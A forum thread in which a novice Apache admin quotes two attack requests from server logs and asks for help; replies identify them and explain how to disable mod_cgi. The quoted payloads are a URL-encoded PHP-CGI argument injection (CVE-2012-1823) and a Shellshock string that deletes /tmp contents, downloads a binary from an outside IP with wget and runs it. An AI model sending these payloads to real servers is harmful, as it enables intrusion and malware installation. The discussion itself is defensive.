# Odd requests from Apache logs

Tags: malware, apache, injection, shellshock

I've been monitoring some weird activity in the access logs for my site and I've noticed a couple of weird attempts against the server. I'm wondering if anyone has seen these before. It's an Apache 2.4.6 server.

The first one that caught my attention was

> %63%67%69%2D%62%69%6E/%7
>   0%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%
>   64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69
>   %6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74
>   %69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65
>   +%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
>   %69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D
>   %30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76
>   %3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
>   %2F%2F%69%6E%70%75%74+%2D%6E

This is an encoded URL which decodes to

> cgi-bin/%7
>   0hp?-d allow_url_include=on -%
>   64 safe_mode=off -d suhosin.si
>   mulation=on -d disable_funct
>   ions="" -d open_basedir=none
>    -d auto_prepend_file=php://
>   input -d cgi.force_redirect=
>   0 -d cgi.redirect_status_env
>   =0 -d auto_prepend_file=php:
>   //input -n

I'm not an experienced admin so I'm not entirely sure what this is attempting to do. It looks like it's trying to inject a CGI script in the /var/www/cgi-bin which redirects to somewhere, can anyone tell me what this is attempting to do?

The other one I noticed looks like a Shellshock attempt:

> "() { :;
>    }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.12.173.173:81/9521 -O /tmp
>   /China.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
>    /tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo r
>   m -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }
>   ; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.12.173.173:81/9521 -O /tmp/C
>   hina.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /
>   tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo rm
>   -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"

My final question is: is there any way to completely disable the CGI module for Apache without re-compiling it from source? From my own reading I've found there is a flag that can be set at compilation time to disable this module completely. The server is hosting one static webpage and that's it, do I really need the bare minimum configuration? Any advice?

Comment: Was the Shellshock attempt successful? If so, are you able to share the Run.sh script? Thanks!

Comment: The first one looks like CVE-2012-1823, php cgi arg injection.

Info here: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

Comment: @Vahid Out of morbid curiosity I wish it had but I'd previously patched my bash version :(                           darkf thanks for the link it looks like it was patched in fedora 15 stable release, i'm not sure how this folds back into centos

Answer (score 0, accepted):

Look in your httpd.conf file. Find the line that loads the mod_cgi module, and comment it out. Restart the Apache service. Test to confirm that CGI execution is disabled.

Comment: Thanks for your response, I've checked my httpd.conf file and the only allude to the module loading is this line 'Include conf.modules.d/*.conf' inside this directory their are a few conf directories including 01-cgi.conf. As a test I moved this out the directory and restarted it, everything seems to be alive but I don't know if i'm missing something? Thanks again for your help

Comment: Yeah, that conf file you moved probably had the declarations in it to load the cgi module and its dependencies. Apache does that to prevent the code equivalent of the Book of Numbers. If it looks alive and functional, why argue with it? Just keep that file in case things blow up.

Comment: shellshock is not just a cgi bug, any script that shells out/ forks() can be abused. The only real fix is to patch bash or atleast replace /bin/sh with a non bash shell.

Comment: OP has said that bash had been patched before this request was made, and it failed. They just want to disable CGI because they don't need it.